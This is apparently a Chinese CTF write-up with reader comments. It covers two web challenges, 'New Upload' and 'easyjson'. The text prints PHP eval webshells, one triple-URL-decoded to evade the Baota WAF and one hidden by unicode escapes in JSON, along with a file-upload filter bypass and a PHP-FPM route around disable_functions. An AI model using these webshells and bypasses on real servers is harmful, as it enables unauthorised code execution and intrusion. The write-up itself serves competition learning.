New Upload
文件上传
测试以后发现除php后缀都能传上去。。
后来发现 0a污染就能传php了
然后就是绕宝塔waf
和disable_function
测试后发现宝塔waf不能解析三次url编码。。
<?php
eval(urldecode(urldecode(urldecode($_POST['ha1c9on']))));
把payload编码三次就可以绕了
在phpinfo里发现需要绕disable_function
发现有fpm
猜测fpm打。发现tmp目录下果然有php-cgi-74.sock
打开蚁剑 选择disable_function插件
注:可以将用burp代理蚁剑,urlencode后传参好像应该也行。
或者自己写一下蚁剑的编码器,呜呜呜
./readflag
easyjson
Post:
{"\u0063\u006f\u006e\u0074\u0065\u006e\u0074":"\u003c\u003f\u0070\u0068\u0070\u0020\u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0050\u004f\u0053\u0054\u005b\u0031\u005d\u0029\u003b\u003f\u003e"}
GET:
action=write&source=1&filename=shell.php
师傅的蚁剑是啥版本的啊我蚁剑比赛时连不上啊
@蔡正曦 就是最新的版本 自己写了编码器
师傅能把蚁剑的具体链接贴出来吗,具体流程,我连上,上传成功,但是打不成功
@夏天 师傅可以把蚁剑给burp urlencode试一下 或者自己写一个编码器之类的 蚁剑就是最新版的 github有
用蚁剑的插件把 打的fpm,为啥传上去之后还是 不能disabled_function 呀
@M 可能需要自己写一下编码器哈
编码器写了,用蚁剑的插件把 so文件和ant.php文件都成功上传,但是去连那个ant.php的时候 连不上去。大师傅知道是什么情况吗